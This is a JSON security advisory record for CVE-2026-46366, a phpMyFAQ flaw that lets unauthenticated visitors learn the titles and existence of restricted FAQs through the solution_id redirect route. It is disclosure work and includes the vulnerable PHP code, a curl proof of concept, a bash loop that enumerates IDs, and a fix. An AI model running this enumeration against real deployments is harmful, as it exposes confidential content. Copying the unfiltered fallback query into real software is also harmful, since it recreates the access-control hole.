{"id":"GHSA-99qv-g4x9-mgc3","summary":"phpMyFAQ has unauthenticated FAQ permission bypass via getFaqBySolutionId fallback query","details":"## Summary\n\nThe public `/solution_id_{id}.html` route calls `Faq::getIdFromSolutionId()` in `phpmyfaq/src/phpMyFAQ/Faq.php:1312`. That query joins `faqdata` with `faqcategoryrelations` solely by `solution_id` and returns the matching FAQ's `id`, `lang`, `thema` (title), and `category_id` with no permission filter. An unauthenticated visitor hits the route with a sequential integer and the server 301-redirects to `/content/\u003ccategory\u003e/\u003cid\u003e/\u003clang\u003e/\u003ctitle-slug\u003e.html`, leaking the FAQ's existence, internal id, language, category binding, and title via the redirect's `Location` header and the redirected page's canonical link, share-to-social URLs, and hidden form fields. The related `getFaqBySolutionId()` at line 1221 contains an explicit fallback query (added \"for tests\") that also bypasses the permission filter, widening the blast radius to any callsite that trusts its result.\n\n## Details\n\n### The sink: `getIdFromSolutionId()` has no permission filter\n\n`phpmyfaq/src/phpMyFAQ/Faq.php:1312`:\n\n```php\npublic function getIdFromSolutionId(int $solutionId): array\n{\n    $query = sprintf(\n        'SELECT fd.id, fd.lang, fd.thema AS question, fd.content, fcr.category_id\n         FROM %sfaqdata fd\n         LEFT JOIN %sfaqcategoryrelations fcr\n           ON fd.id = fcr.record_id AND fd.lang = fcr.record_lang\n         WHERE fd.solution_id = %d',\n        Database::getTablePrefix(),\n        Database::getTablePrefix(),\n        $solutionId,\n    );\n    // ...\n}\n```\n\nNo `WHERE`-clause permission filter, no group/user filter. Every callsite that trusts this method exposes restricted FAQs. The route at `phpmyfaq/src/phpMyFAQ/Controller/Frontend/FaqController.php:172` uses this result to compute a slugified URL and 301-redirects to it:\n\n```php\n#[Route(path: '/solution_id_{solutionId}.html', name: 'public.faq.solution', methods: ['GET'])]\npublic function solution(Request $request): Response\n{\n    $solutionId = Filter::filterVar($request-\u003eattributes-\u003eget('solutionId'), FILTER_VALIDATE_INT, 0);\n    // ...\n    $faqData = $this-\u003efaq-\u003egetIdFromSolutionId($solutionId);\n    if ($faqData === []) {\n        return new Response('', Response::HTTP_NOT_FOUND);\n    }\n    $slug = TitleSlugifier::slug($faqData['question']);\n    $url = sprintf('/content/%d/%d/%s/%s.html',\n        $faqData['category_id'], $faqData['id'], $faqData['lang'], $slug);\n    return new RedirectResponse($url, Response::HTTP_MOVED_PERMANENTLY);\n}\n```\n\nThe redirect URL embeds the title slug, so an unauthenticated visitor observes the title directly even though the canonical `/content/\u003c...\u003e.html` page may deny rendering the body.\n\n### Related sink: `getFaqBySolutionId()` explicitly falls back without the filter\n\n`phpmyfaq/src/phpMyFAQ/Faq.php:1256-1265`:\n\n```php\nif (false === $row || null === $row) {\n    // Fallback without permission filter to ensure retrieval in non-authenticated contexts (e.g., tests)\n    $fallbackQuery = sprintf(\n        'SELECT * FROM %sfaqdata fd WHERE fd.solution_id = %d LIMIT 1',\n        Database::getTablePrefix(),\n        $solutionId,\n    );\n    $fallbackResult = $this-\u003econfiguration-\u003egetDb()-\u003equery($fallbackQuery);\n    $row = $this-\u003econfiguration-\u003egetDb()-\u003efetchObject($fallbackResult);\n}\n```\n\nThe inline comment confirms the fallback was introduced for test convenience. In production, the fallback fires exactly when the permission-filtered query returns zero rows (because the caller is unauthenticated or lacks group/user permission) and populates every field of `faqRecord`, including `content`, `keywords`, `author`, `email`, and `notes`. Downstream consumers that expect `faqRecord` to respect ACLs no longer do.\n\n### Entry enumeration\n\nSolution IDs are monotonically increasing integers (`faqdata.solution_id`). An attacker enumerates `/solution_id_\u003cn\u003e.html` from 1 upward and records every non-404 response to discover the full set of FAQs on the instance, including ones restricted to admin-only groups or specific users.\n\n## Proof of Concept\n\nPrerequisites: a phpMyFAQ instance has at least one FAQ record restricted to a specific user or group via `faqdata_user` / `faqdata_group`. Note its `solution_id`, which is assigned sequentially starting from a six-digit base.\n\nStep 1. Anonymous GET of the solution URL:\n\n```bash\ncurl -sS -L -o /tmp/out.html -w 'HTTP %{http_code}\\n' \\\n  'http://\u003chost\u003e/solution_id_\u003crestricted-solution-id\u003e.html'\n```\n\nStep 2. Observe the 301 redirect that `getIdFromSolutionId()` returns. The `Location` header carries the slugified title of the restricted FAQ directly in the URL path:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: /content/\u003ccategory-id\u003e/\u003crecord-id\u003e/\u003clang\u003e/\u003ctitle-slug\u003e.html\n```\n\nStep 3. The redirected content page embeds the same metadata in client-controlled sinks, even when the body rendering is suppressed by a separate permission check:\n\n```html\n\u003clink rel=\"canonical\" href=\"http://\u003chost\u003e/content/\u003ccategory-id\u003e/\u003crecord-id\u003e/\u003clang\u003e/\u003ctitle-slug\u003e.html\"\u003e\n\u003cinput type=\"hidden\" name=\"voting-id\" value=\"\u003crecord-id\u003e\"\u003e\n\u003ca href=\"http://\u003chost\u003e/pdf/\u003ccategory-id\u003e/\u003crecord-id\u003e/\u003clang\u003e\"\u003e...\u003c/a\u003e\n```\n\nStep 4. Enumerate solution IDs to discover every FAQ on the instance, including those the permission model intended to hide:\n\n```bash\nfor id in $(seq 1 100000); do\n  code=$(curl -sS -o /dev/null -w '%{http_code}' \"http://\u003chost\u003e/solution_id_${id}.html\")\n  if [ \"$code\" = \"301\" ]; then\n    loc=$(curl -sSI \"http://\u003chost\u003e/solution_id_${id}.html\" | awk -F': ' '/^Location:/{print $2}' | tr -d '\\r')\n    echo \"solution_id=${id} -\u003e ${loc}\"\n  fi\ndone\n```\n\nEach `301` response's `Location` header reveals category, id, language, and title of a FAQ whose existence the permission model meant to hide.\n\n## Impact\n\nAny unauthenticated visitor discovers the full set of FAQ entries on the instance, including the subset restricted to specific groups or users, and reads the title of every restricted FAQ. Deployments that use phpMyFAQ to host internal-only content alongside public content (staff knowledge bases, internal SOPs, confidential customer notes) lose the confidentiality of titles and of the fact that those FAQs exist. Slugified titles often encode the subject directly (for example `q3-layoff-plan`, `aws-root-key-rotation`), so the title alone can be sensitive.\n\nThe body content is usually still served through a separate permission-enforcing path on the canonical `/content/\u003c...\u003e.html` URL, so full-body disclosure requires the caller to also defeat that path (for example by combining with a session from any low-privilege account). The title-plus-existence leak is sufficient on its own to harm confidentiality in deployments where titles encode what the FAQ is about.\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (Medium, 5.3). CWE-863.\n\n## Recommended Fix\n\nAdd a permission filter to `getIdFromSolutionId()` the same way `getFaqBySolutionId()` builds one for its primary query (using `QueryHelper::queryPermission()`):\n\n```php\npublic function getIdFromSolutionId(int $solutionId): array\n{\n    $queryHelper = new QueryHelper($this-\u003euser, $this-\u003egroups);\n    $query = sprintf(\n        'SELECT fd.id, fd.lang, fd.thema AS question, fd.content, fcr.category_id\n         FROM %sfaqdata fd\n         LEFT JOIN %sfaqcategoryrelations fcr\n           ON fd.id = fcr.record_id AND fd.lang = fcr.record_lang\n         LEFT JOIN (\n             SELECT record_id, group_id FROM %sfaqdata_group fdg WHERE fdg.group_id \u003c\u003e -1\n             UNION ALL\n             SELECT fd.id AS record_id, -1 AS group_id FROM %sfaqdata fd WHERE fd.solution_id = %d\n         ) AS fdg ON fd.id = fdg.record_id\n         LEFT JOIN %sfaqdata_user fdu ON fd.id = fdu.record_id\n         WHERE fd.solution_id = %d %s',\n        Database::getTablePrefix(),\n        Database::getTablePrefix(),\n        Database::getTablePrefix(),\n        Database::getTablePrefix(),\n        $solutionId,\n        Database::getTablePrefix(),\n        $solutionId,\n        $queryHelper-\u003equeryPermission($this-\u003egroupSupport),\n    );\n    // ...\n}\n```\n\nSeparately, remove the unconditional fallback in `getFaqBySolutionId()` at `Faq.php:1256-1265`. If the permission-filtered query returns no rows, the FAQ is not visible to this caller; the method should leave `faqRecord` empty rather than re-query without the filter. If tests rely on the old behavior, replace the production fallback with a dedicated test helper or a flag that is disabled outside test bootstrap.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*","aliases":["CVE-2026-46366"],"modified":"2026-06-09T00:15:15.805886063Z","published":"2026-05-06T20:45:01Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-863"],"github_reviewed":true,"github_reviewed_at":"2026-05-06T20:45:01Z","severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-99qv-g4x9-mgc3"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-46366"},{"type":"PACKAGE","url":"https://github.com/thorsten/phpMyFAQ"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-information-disclosure-via-getidfromsolutionid-permission-bypass"}],"affected":[{"package":{"name":"thorsten/phpmyfaq","ecosystem":"Packagist","purl":"pkg:composer/thorsten%2Fphpmyfaq"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.1.2"}]}],"versions":["2.10.0-alpha","2.8.0","2.8.0-RC","2.8.0-RC2","2.8.0-RC3","2.8.0-RC4","2.8.0-alpha2","2.8.0-alpha3","2.8.0-beta","2.8.0-beta2","2.8.0-beta3","2.8.1","2.8.10","2.8.11","2.8.12","2.8.13","2.8.14","2.8.15","2.8.16","2.8.17","2.8.18","2.8.19","2.8.2","2.8.20","2.8.21","2.8.22","2.8.23","2.8.24","2.8.25","2.8.26","2.8.27","2.8.28","2.8.29","2.8.3","2.8.4","2.8.5","2.8.6","2.8.7","2.8.8","2.8.9","2.9.0","2.9.0-alpha","2.9.0-alpha2","2.9.0-alpha3","2.9.0-alpha4","2.9.0-beta","2.9.0-beta2","2.9.0-rc","2.9.0-rc2","2.9.0-rc3","2.9.0-rc4","2.9.1","2.9.10","2.9.11","2.9.12","2.9.13","2.9.2","2.9.3","2.9.4","2.9.5","2.9.6","2.9.7","2.9.8","2.9.9","3.0.0","3.0.0-RC","3.0.0-RC.2","3.0.0-alpha","3.0.0-alpha.2","3.0.0-alpha.3","3.0.0-alpha.4","3.0.0-beta","3.0.0-beta.2","3.0.0-beta.3","3.0.1","3.0.10","3.0.11","3.0.12","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.0.8","3.0.9","3.1.0","3.1.0-RC","3.1.0-alpha","3.1.0-alpha.2","3.1.0-alpha.3","3.1.0-beta","3.1.1","3.1.10","3.1.11","3.1.12","3.1.13","3.1.14","3.1.15","3.1.16","3.1.17","3.1.18","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","3.2.0","3.2.0-RC","3.2.0-RC.2","3.2.0-RC.4","3.2.0-alpha","3.2.0-beta","3.2.0-beta.2","3.2.1","3.2.10","3.2.2","3.2.3","3.2.4","3.2.5","3.2.6","3.2.7","3.2.8","3.2.9","4.0.0","4.0.0-RC","4.0.0-RC.2","4.0.0-RC.3","4.0.0-RC.4","4.0.0-RC.5","4.0.0-alpha","4.0.0-alpha.2","4.0.0-alpha.3","4.0.0-alpha.4","4.0.0-beta","4.0.0-beta.2","4.0.1","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.0.15","4.0.16","4.0.18","4.0.19","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.1.0","4.1.0-RC","4.1.0-RC.2","4.1.0-RC.4","4.1.0-RC.5","4.1.0-RC.6","4.1.0-RC.7","4.1.0-alpha","4.1.0-alpha.2","4.1.0-alpha.3","4.1.0-beta","4.1.0-beta.2","4.1.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-99qv-g4x9-mgc3/GHSA-99qv-g4x9-mgc3.json","last_known_affected_version_range":"\u003c= 4.1.1"}},{"package":{"name":"phpmyfaq/phpmyfaq","ecosystem":"Packagist","purl":"pkg:composer/phpmyfaq%2Fphpmyfaq"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.1.2"}]}],"versions":["2.10.0-alpha","2.8.0","2.8.0-RC","2.8.0-RC2","2.8.0-RC3","2.8.0-RC4","2.8.0-alpha2","2.8.0-alpha3","2.8.0-beta","2.8.0-beta2","2.8.0-beta3","2.8.1","2.8.10","2.8.11","2.8.12","2.8.13","2.8.14","2.8.15","2.8.16","2.8.17","2.8.18","2.8.19","2.8.2","2.8.20","2.8.21","2.8.22","2.8.23","2.8.24","2.8.25","2.8.26","2.8.27","2.8.28","2.8.29","2.8.3","2.8.4","2.8.5","2.8.6","2.8.7","2.8.8","2.8.9","2.9.0","2.9.0-alpha","2.9.0-alpha2","2.9.0-alpha3","2.9.0-alpha4","2.9.0-beta","2.9.0-beta2","2.9.0-rc","2.9.0-rc2","2.9.0-rc3","2.9.0-rc4","2.9.1","2.9.10","2.9.11","2.9.12","2.9.13","2.9.2","2.9.3","2.9.4","2.9.5","2.9.6","2.9.7","2.9.8","2.9.9","3.0.0","3.0.0-RC","3.0.0-RC.2","3.0.0-alpha","3.0.0-alpha.2","3.0.0-alpha.3","3.0.0-alpha.4","3.0.0-beta","3.0.0-beta.2","3.0.0-beta.3","3.0.1","3.0.10","3.0.11","3.0.12","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.0.8","3.0.9","3.1.0","3.1.0-RC","3.1.0-alpha","3.1.0-alpha.2","3.1.0-alpha.3","3.1.0-beta","3.1.1","3.1.10","3.1.11","3.1.12","3.1.13","3.1.14","3.1.15","3.1.16","3.1.17","3.1.18","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","3.2.0","3.2.0-RC","3.2.0-RC.2","3.2.0-RC.4","3.2.0-alpha","3.2.0-beta","3.2.0-beta.2","3.2.1","3.2.10","3.2.2","3.2.3","3.2.4","3.2.5","3.2.6","3.2.7","3.2.8","3.2.9","4.0.0","4.0.0-RC","4.0.0-RC.2","4.0.0-RC.3","4.0.0-RC.4","4.0.0-RC.5","4.0.0-alpha","4.0.0-alpha.2","4.0.0-alpha.3","4.0.0-alpha.4","4.0.0-beta","4.0.0-beta.2","4.0.1","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.0.15","4.0.16","4.0.18","4.0.19","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.1.0","4.1.0-RC","4.1.0-RC.2","4.1.0-RC.4","4.1.0-RC.5","4.1.0-RC.6","4.1.0-RC.7","4.1.0-alpha","4.1.0-alpha.2","4.1.0-alpha.3","4.1.0-beta","4.1.0-beta.2","4.1.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-99qv-g4x9-mgc3/GHSA-99qv-g4x9-mgc3.json","last_known_affected_version_range":"\u003c= 4.1.1"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}]}